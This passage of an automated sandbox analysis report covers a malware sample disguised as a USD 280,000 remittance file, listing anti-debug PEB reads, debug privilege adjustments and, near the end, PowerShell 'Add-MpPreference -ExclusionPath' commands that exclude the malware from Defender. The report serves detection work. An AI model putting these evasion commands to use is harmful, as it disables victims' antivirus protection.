            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A03E9 mov eax, dword ptr fs:[00000030h]9_2_017A03E9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov eax, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov ecx, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov eax, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01868324 mov eax, dword ptr fs:[00000030h]9_2_01868324
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A3C0 mov eax, dword ptr fs:[00000030h]9_2_0179A3C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017983C0 mov eax, dword ptr fs:[00000030h]9_2_017983C0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01812349 mov eax, dword ptr fs:[00000030h]9_2_01812349
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0186634F mov eax, dword ptr fs:[00000030h]9_2_0186634F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01838350 mov ecx, dword ptr fs:[00000030h]9_2_01838350
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0185A352 mov eax, dword ptr fs:[00000030h]9_2_0185A352
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov ecx, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181035C mov eax, dword ptr fs:[00000030h]9_2_0181035C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788397 mov eax, dword ptr fs:[00000030h]9_2_01788397
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788397 mov eax, dword ptr fs:[00000030h]9_2_01788397
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01788397 mov eax, dword ptr fs:[00000030h]9_2_01788397
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178E388 mov eax, dword ptr fs:[00000030h]9_2_0178E388
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178E388 mov eax, dword ptr fs:[00000030h]9_2_0178E388
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178E388 mov eax, dword ptr fs:[00000030h]9_2_0178E388
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B438F mov eax, dword ptr fs:[00000030h]9_2_017B438F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B438F mov eax, dword ptr fs:[00000030h]9_2_017B438F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183437C mov eax, dword ptr fs:[00000030h]9_2_0183437C
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01810283 mov eax, dword ptr fs:[00000030h]9_2_01810283
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01810283 mov eax, dword ptr fs:[00000030h]9_2_01810283
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01810283 mov eax, dword ptr fs:[00000030h]9_2_01810283
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178826B mov eax, dword ptr fs:[00000030h]9_2_0178826B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794260 mov eax, dword ptr fs:[00000030h]9_2_01794260
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794260 mov eax, dword ptr fs:[00000030h]9_2_01794260
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01794260 mov eax, dword ptr fs:[00000030h]9_2_01794260
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796259 mov eax, dword ptr fs:[00000030h]9_2_01796259
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018262A0 mov eax, dword ptr fs:[00000030h]9_2_018262A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018262A0 mov ecx, dword ptr fs:[00000030h]9_2_018262A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018262A0 mov eax, dword ptr fs:[00000030h]9_2_018262A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018262A0 mov eax, dword ptr fs:[00000030h]9_2_018262A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018262A0 mov eax, dword ptr fs:[00000030h]9_2_018262A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018262A0 mov eax, dword ptr fs:[00000030h]9_2_018262A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178A250 mov eax, dword ptr fs:[00000030h]9_2_0178A250
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0178823B mov eax, dword ptr fs:[00000030h]9_2_0178823B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018662D6 mov eax, dword ptr fs:[00000030h]9_2_018662D6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A02E1 mov eax, dword ptr fs:[00000030h]9_2_017A02E1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A02E1 mov eax, dword ptr fs:[00000030h]9_2_017A02E1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A02E1 mov eax, dword ptr fs:[00000030h]9_2_017A02E1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A2C3 mov eax, dword ptr fs:[00000030h]9_2_0179A2C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A2C3 mov eax, dword ptr fs:[00000030h]9_2_0179A2C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A2C3 mov eax, dword ptr fs:[00000030h]9_2_0179A2C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A2C3 mov eax, dword ptr fs:[00000030h]9_2_0179A2C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0179A2C3 mov eax, dword ptr fs:[00000030h]9_2_0179A2C3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01818243 mov eax, dword ptr fs:[00000030h]9_2_01818243
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01818243 mov ecx, dword ptr fs:[00000030h]9_2_01818243
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184A250 mov eax, dword ptr fs:[00000030h]9_2_0184A250
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0184A250 mov eax, dword ptr fs:[00000030h]9_2_0184A250
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A02A0 mov eax, dword ptr fs:[00000030h]9_2_017A02A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A02A0 mov eax, dword ptr fs:[00000030h]9_2_017A02A0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0186625D mov eax, dword ptr fs:[00000030h]9_2_0186625D
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01840274 mov eax, dword ptr fs:[00000030h]9_2_01840274
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CE284 mov eax, dword ptr fs:[00000030h]9_2_017CE284
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CE284 mov eax, dword ptr fs:[00000030h]9_2_017CE284
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C656A mov eax, dword ptr fs:[00000030h]9_2_017C656A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C656A mov eax, dword ptr fs:[00000030h]9_2_017C656A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C656A mov eax, dword ptr fs:[00000030h]9_2_017C656A
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018105A7 mov eax, dword ptr fs:[00000030h]9_2_018105A7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018105A7 mov eax, dword ptr fs:[00000030h]9_2_018105A7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_018105A7 mov eax, dword ptr fs:[00000030h]9_2_018105A7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798550 mov eax, dword ptr fs:[00000030h]9_2_01798550
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798550 mov eax, dword ptr fs:[00000030h]9_2_01798550
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE53E mov eax, dword ptr fs:[00000030h]9_2_017BE53E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE53E mov eax, dword ptr fs:[00000030h]9_2_017BE53E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE53E mov eax, dword ptr fs:[00000030h]9_2_017BE53E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE53E mov eax, dword ptr fs:[00000030h]9_2_017BE53E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE53E mov eax, dword ptr fs:[00000030h]9_2_017BE53E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0535 mov eax, dword ptr fs:[00000030h]9_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0535 mov eax, dword ptr fs:[00000030h]9_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0535 mov eax, dword ptr fs:[00000030h]9_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0535 mov eax, dword ptr fs:[00000030h]9_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0535 mov eax, dword ptr fs:[00000030h]9_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0535 mov eax, dword ptr fs:[00000030h]9_2_017A0535
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01826500 mov eax, dword ptr fs:[00000030h]9_2_01826500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01864500 mov eax, dword ptr fs:[00000030h]9_2_01864500
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CC5ED mov eax, dword ptr fs:[00000030h]9_2_017CC5ED
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CC5ED mov eax, dword ptr fs:[00000030h]9_2_017CC5ED
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017925E0 mov eax, dword ptr fs:[00000030h]9_2_017925E0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BE5E7 mov eax, dword ptr fs:[00000030h]9_2_017BE5E7
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017965D0 mov eax, dword ptr fs:[00000030h]9_2_017965D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA5D0 mov eax, dword ptr fs:[00000030h]9_2_017CA5D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CA5D0 mov eax, dword ptr fs:[00000030h]9_2_017CA5D0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CE5CF mov eax, dword ptr fs:[00000030h]9_2_017CE5CF
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CE5CF mov eax, dword ptr fs:[00000030h]9_2_017CE5CF
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017A0A5B mov eax, dword ptr fs:[00000030h]9_2_017A0A5B
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01796A50 mov eax, dword ptr fs:[00000030h]9_2_01796A50
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA38 mov eax, dword ptr fs:[00000030h]9_2_017CCA38
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B4A35 mov eax, dword ptr fs:[00000030h]9_2_017B4A35
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017B4A35 mov eax, dword ptr fs:[00000030h]9_2_017B4A35
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017BEA2E mov eax, dword ptr fs:[00000030h]9_2_017BEA2E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CCA24 mov eax, dword ptr fs:[00000030h]9_2_017CCA24
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0181CA11 mov eax, dword ptr fs:[00000030h]9_2_0181CA11
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CAAEE mov eax, dword ptr fs:[00000030h]9_2_017CAAEE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017CAAEE mov eax, dword ptr fs:[00000030h]9_2_017CAAEE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01790AD0 mov eax, dword ptr fs:[00000030h]9_2_01790AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C4AD0 mov eax, dword ptr fs:[00000030h]9_2_017C4AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C4AD0 mov eax, dword ptr fs:[00000030h]9_2_017C4AD0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6ACC mov eax, dword ptr fs:[00000030h]9_2_017E6ACC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6ACC mov eax, dword ptr fs:[00000030h]9_2_017E6ACC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6ACC mov eax, dword ptr fs:[00000030h]9_2_017E6ACC
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798AA0 mov eax, dword ptr fs:[00000030h]9_2_01798AA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_01798AA0 mov eax, dword ptr fs:[00000030h]9_2_01798AA0
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017E6AA4 mov eax, dword ptr fs:[00000030h]9_2_017E6AA4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0183EA60 mov eax, dword ptr fs:[00000030h]9_2_0183EA60
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017C8A90 mov edx, dword ptr fs:[00000030h]9_2_017C8A90
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
